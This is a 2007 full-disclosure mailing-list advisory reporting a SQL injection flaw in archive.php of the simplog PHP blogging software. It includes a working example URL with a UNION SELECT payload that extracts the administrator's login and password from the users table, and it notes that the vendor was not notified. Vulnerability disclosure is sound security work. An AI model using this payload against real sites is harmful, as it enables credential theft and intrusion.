[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 02 Jan 2007 00:31:49 +0200
From: Javor Ninov <drfrancky@...urax.org>
To: Full Disclosure <full-disclosure@...ts.grok.org.uk>,
bugtraq@...urityfocus.com
Subject: simplog 0.9.3.2 SQL injection
Afected Software:
simplog up to 0.9.3.2 (latest version - 12/05/2006 )
Site:
http://www.simplog.org
Simplog provides an easy way for users to add blogging capabilities to
their existing websites. Simplog is written in PHP and compatible with
multiple databases. Simplog also features an RSS/Atom aggregator/reader.
Powerful, yet simple
Vulnerability:
SQL Injection in archive.php
other files probably also affected
Example:
http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
Vendor status:
NOT NOTIFIED
Javor Ninov aka DrFrancky
drfrancky shift+2 securax.org
http://securitydot.net/
Download attachment "signature.asc" of type "application/pgp-signature" (190 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists